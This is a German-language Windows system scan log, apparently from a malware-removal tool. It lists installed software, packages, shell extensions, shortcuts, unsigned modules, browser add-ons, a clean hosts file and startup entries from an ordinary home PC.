Epic Games Launcher (HKLM-x32\...\{07D9F8F3-EC99-4133-919D-DA341C62937C}) (Version: 1.1.298.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2.1 - )
Excel (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel)
Far Cry 3 (HKLM-x32\...\Uplay Install 46) (Version:  - Ubisoft)
Futuremark SystemInfo (HKLM-x32\...\{F608ED5F-3818-4F87-A277-E52E8790C039}) (Version: 5.35.871.0 - Futuremark)
GaomonTablet (HKLM-x32\...\GaomonTablet) (Version: 1.1.1.1 - Gaomon)
GeoGebra Classic (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\GeoGebra_6) (Version: 6.0.620 - International GeoGebra Institute)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.134 - Google LLC)
Grammarly for Windows (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Grammarly Desktop Integrations) (Version: 1.0.10.223 - )
IIS 10.0 Express (HKLM\...\{0307C98E-AE82-4A4F-A950-A72FBD805338}) (Version: 10.0.04403 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - ) Hidden
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - ) Hidden
Inkscape (HKLM\...\{776C087E-B714-4153-9414-79592EC61B4A}) (Version: 1.0.1 - Inkscape)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
MATLAB R2020b (HKLM\...\Matlab R2020b) (Version: 9.9 - MathWorks)
Microsoft .NET Framework 4.8 SDK (HKLM-x32\...\{949C0535-171C-480F-9CF4-D25C9E60FE88}) (Version: 4.8.03928 - Microsoft Corporation) Hidden
Microsoft .NET Host - 5.0.17 (x64) (HKLM\...\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 5.0.17 (x64) (HKLM\...\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 5.0.17 (x64) (HKLM\...\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\OneDriveSetup.exe) (Version: 21.196.0921.0007 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{33B8D051-4DF5-4103-8FDB-8663E468A204}) (Version: 13.1.4001.0 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Teams) (Version: 1.4.00.11161 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (HKLM-x32\...\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (HKLM-x32\...\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29334 (HKLM-x32\...\{a9cfe9c7-e54f-46cd-9c5c-542ff8e3e8c4}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29914 (HKLM-x32\...\{1b5476d9-ab8e-4b0d-b004-059a1bd5568b}) (Version: 14.28.29914.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29334 (HKLM\...\{2E11EF4E-901F-4B2D-B68E-3DB2A566C857}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29334 (HKLM\...\{8A3F7D5B-422D-49D9-84F7-8DC1B7782967}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29914 (HKLM-x32\...\{BD8C6100-7C7D-48DD-93BA-69F6828213FE}) (Version: 14.28.29914 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29914 (HKLM-x32\...\{42365A3A-622A-4EED-A727-FE192A794AFD}) (Version: 14.28.29914 - Microsoft Corporation) Hidden
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{9495AEB4-AB97-39DE-8C42-806EEF75ECA7}) (Version: 10.0.50908 - Microsoft Corporation) Hidden
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.55.2 - Microsoft Corporation)
Microsoft Web Deploy 4.0 (HKLM\...\{2EC26D34-FB67-4C58-AC20-235697551222}) (Version: 10.0.3802 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 5.0.17 (x64) (HKLM\...\{3C31CBA1-A0D9-4B95-A807-AD2313D12F47}) (Version: 40.68.31219 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 5.0.17 (x64) (HKLM-x32\...\{20d5df4e-006c-4d6d-a0dc-490d009b9786}) (Version: 5.0.17.31219 - Microsoft Corporation)
MiKTeX (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\MiKTeX) (Version: 20.11 - MiKTeX.org)
MNF Club (HKLM-x32\...\{E829E337-B9F9-422B-9D88-5EB8B1CC1A2A}) (Version: 1.03 - MNF Games Ltd)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 91.10.0 - Mozilla)
Mozilla Thunderbird (x64 de) (HKLM\...\Mozilla Thunderbird 91.10.0 (x64 de)) (Version: 91.10.0 - Mozilla)
Nefarius Virtual Gamepad Emulation Bus Driver (HKLM\...\{93D91F60-7C94-4A79-863F-EA713D2EB3F3}) (Version: 1.17.333.0 - Nefarius Software Solutions e.U.)
NordVPN (HKLM\...\{19465C24-3D5D-4327-B99F-3CC0A1D38151}_is1) (Version: 6.41.11.0 - TEFINCOM S.A.)
NordVPN network TAP (HKLM-x32\...\{97DEC5D6-2BE9-45BB-BFC5-274B851B486B}) (Version: 1.0.1 - NordVPN)
NordVPN network TUN (HKLM\...\{BD0E4F38-D3F6-452D-A32E-B14D721839AC}) (Version: 1.0.1 - NordVPN)
NVIDIA FrameView SDK 1.1.4923.29968894 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29968894 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.23.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.23.0.74 - NVIDIA Corporation)
NVIDIA Grafiktreiber 496.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 496.13 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.92 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 26.1.1 - OBS Project)
Oculus (HKLM\...\Oculus) (Version: <3 - Facebook Technologies, LLC)
OpenBoard (1.5.4.240) (HKLM-x32\...\{8CCA6AC7-BBF9-4DD2-8E70-A907E0FCA38F}}_is1) (Version: 1.5.4.240 - Open Education Foundation)
OpenConnect-GUI (HKLM-x32\...\OpenConnect-GUI) (Version: 1.5.3 - OpenConnect-GUI Team)
Opera GX Stable 79.0.4143.73 (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Opera GX 79.0.4143.73) (Version: 79.0.4143.73 - Opera Software)
Opera GX Stable 88.0.4412.85 (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Opera GX 88.0.4412.85) (Version: 88.0.4412.85 - Opera Software)
Opera Stable 89.0.4447.48 (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Opera 89.0.4447.48) (Version: 89.0.4447.48 - Opera Software)
PhotoStage Diashow-Programm (HKLM-x32\...\PhotoStage) (Version: 8.65 - NCH Software)
PowerPoint (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
PyCharm Community Edition 2021.2 (HKLM-x32\...\PyCharm Community Edition 2021.2) (Version: 212.4746.96 - JetBrains s.r.o.)
Python 3.9.4 (64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{8a52f2bf-c3d0-4872-bc3d-61f6eab0cbf2}) (Version: 3.9.4150.0 - Python Software Foundation)
Python 3.9.4 Add to Path (64-bit) (HKLM\...\{B943A821-11D8-4FB4-B573-6D04DCC596AD}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{1C17C2CE-B315-4C1C-885A-E37181C7368E}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CB856DD1-55A4-42B3-B676-73DDE515A589}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Documentation (64-bit) (HKLM\...\{73524E2A-5D97-4CB8-8438-5FE8F9653F1C}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Executables (64-bit) (HKLM\...\{EDBB67F1-B275-4AC6-9D32-0A033570A705}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{1FDC7BC3-4CE5-4236-A8C2-0C4A7AFFDFA4}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Standard Library (64-bit) (HKLM\...\{91ED5736-9D50-4991-87DC-CFB0492D1A22}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{4E0E4F08-ECD0-4737-ABFC-030B702AC2BF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Test Suite (64-bit) (HKLM\...\{F12FD64B-8964-4F40-8448-7FA3955C5AD6}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{BBCC595F-93C2-4054-9565-8F4F19B3D706}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{BDD80906-41E0-43DB-8C65-D8BCCEB3A3F8}) (Version: 3.9.7400.0 - Python Software Foundation)
Razer Synapse (HKLM-x32\...\Razer Synapse) (Version: 3.7.0228.022817 - Razer Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8746.1 - Realtek Semiconductor Corp.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TechPowerUp GPU-Z (HKLM-x32\...\{8B0F211E-5846-4FB2-B0B9-4EB31546FDF9}}_is1) (Version:  - TechPowerUp)
TeXstudio - TeXstudio is a fully featured LaTeX editor. (HKLM\...\TeXstudio) (Version: 3.1.1 - Benito van der Zander)
TeXstudio - TeXstudio is a fully featured LaTeX editor. (HKLM-x32\...\TeXstudio) (Version: 3.0.1 - Benito van der Zander)
Twitch (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 114.1 - Ubisoft)
Unity Hub 2.4.2 (HKLM\...\{Unity Technologies - Hub}) (Version: 2.4.2 - Unity Technologies Inc.)
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Windows SDK AddOn (HKLM-x32\...\{E6F877A1-2F65-4BF0-87B6-A4071B7663D3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{4254C1AD-B9B0-4020-A4B1-D8B61D12142A}) (Version: 3.7.2204.15001 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{63EFBDB5-01B0-4614-BE9F-7F1908E42275}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{B3956CF3-F6C5-4567-AC38-1FD4432B319C}) (Version: 3.6.2204.08001 - Microsoft Corporation)
Windows-Treiberpaket - Razer Inc. (WinUSB) USB  (05/04/2016 6.2.9200.16385) (HKLM\...\874D6B1A2BD2AE8FF3594AB704F2A4A3F8342FB5) (Version: 05/04/2016 6.2.9200.16385 - Razer Inc.)
WinRAR 6.00 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.00.0 - win.rar GmbH)
Word (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word)
Workflow Manager Client 1.0 (HKLM\...\{831D3854-30D1-4A11-927C-8E94B8091949}) (Version: 2.1.10525.2 - Microsoft Corporation) Hidden
Zoom (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\ZoomUMX) (Version: 5.9.1 (2581) - Zoom Video Communications, Inc.)
Zoom (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\ZoomUMX) (Version: 5.5.4 (13142.0301) - Zoom Video Communications, Inc.)

Packages:
=========
ASUS Grid (Beta) -> C:\Program Files\WindowsApps\B9ECED6F.133F79A42C6_1.0.14.0_x64__qmba6cd70vzyy [2021-03-09] (ASUSTeK COMPUTER INC.)
Cool File Viewer -> C:\Program Files\WindowsApps\20815shootingapp.AirFileViewer_1.4.14.0_x86__xcg28tkrsnqww [2022-01-31] (Cool File Viewer)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-10] (Microsoft Studios) [MS Ad]
Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_52.10620.425.0_x64__8wekyb3d8bbwe [2022-07-07] (Microsoft Corporation)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-01-18] (NVIDIA Corp.)
Outlook -> C:\Program Files\WindowsApps\outlook.com-78C9D47_1.0.0.0_neutral__3t89ybq5n4y7r [2022-06-07] (outlook.com)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.189.862.0_x64__zpdnekdrzrea0 [2022-07-11] (Spotify AB) [Startup Task]
XING -> C:\Program Files\WindowsApps\XINGAG.XING_4.0.9.0_x86__xpfg3f7e9an52 [2021-06-04] (New Work SE)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [SystemSpeedupFilesMenu] -> {14cb2bd0-2375-3d10-9b5d-5e18865c8959} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [SystemSpeedupFoldersMenu] -> {700866bb-c8e9-3e71-b359-abb28baed0e8} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\nvshext.dll [2021-10-07] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers5: [SystemSpeedupDesktopMenu] -> {0cab5786-30e8-3185-9b3b-ccefbf1b8afe} => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.ShellExtension.DLL [2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-12-01] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeX Live 2020\TeX Live command-line.lnk -> C:\texlive\2020\tlpkg\installer\tl-cmd.bat ()
Shortcut: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeX Live 2020\Uninstall TeX Live.lnk -> C:\texlive\2020\tlpkg\installer\uninst.bat ()
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=opfacbhaojodjaojgocnibmklknchehf
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi
ShortcutWithArgument: C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (Anaconda).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Anaconda\Scripts\activate.bat C:\Anaconda

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2021-01-03 21:09 - 2022-03-04 04:23 - 126965248 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2021-01-03 21:09 - 2021-11-17 13:38 - 000384000 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2021-01-03 21:09 - 2021-11-17 13:38 - 008006656 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2019-10-30 18:17 - 2019-10-30 18:17 - 000368128 _____ () [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\NSConfiguratorDaemonModule.dll
2019-10-30 18:30 - 2019-10-30 18:30 - 000230912 _____ () [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Sonic Studio 3\ProfileSwitcherDaemonModule.dll
2022-06-17 19:17 - 2022-06-17 19:17 - 003864576 _____ (Newtonsoft) [Datei ist nicht signiert] C:\Windows\assembly\NativeImages_v4.0.30319_64\Newtonsoft.Json\9d6cba07e22ce2773a043f171286465c\Newtonsoft.Json.ni.dll
2021-01-03 21:09 - 2022-03-04 04:23 - 000983552 _____ (The Chromium Authors) [Datei ist nicht signiert] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2019-12-07 11:14 - 2022-07-20 22:21 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1       localhost

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Oculus\Support\oculus-runtime;C:\Program Files (x86)\Razer Chroma SDK\bin;C:\Program Files\Razer Chroma SDK\bin;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2020b\runtime\win64;C:\Program Files\MATLAB\R2020b\bin;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\
HKU\S-1-5-21-292222086-413629167-3624375346-1001\Control Panel\Desktop\\Wallpaper -> c:\users\chris\downloads\wallpaperflare.com_wallpaper.jpg
HKU\S-1-5-21-292222086-413629167-3624375346-1006\Control Panel\Desktop\\Wallpaper -> C:\Users\Lisa\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\20160918_124612.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet 3: NordVPN LightWeight Firewall -> NordLwf (enabled) 
Ethernet: NordVPN LightWeight Firewall -> NordLwf (enabled) 
WLAN 2: NordVPN LightWeight Firewall -> NordLwf (enabled) 
Ethernet 2: NordVPN LightWeight Firewall -> NordLwf (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => ""
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX2"
HKLM\...\StartupApproved\Run32: => "Avira System Speedup User Starter"
HKLM\...\StartupApproved\Run32: => ""
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Synapse3"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Grammarly"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54"
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => ""

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

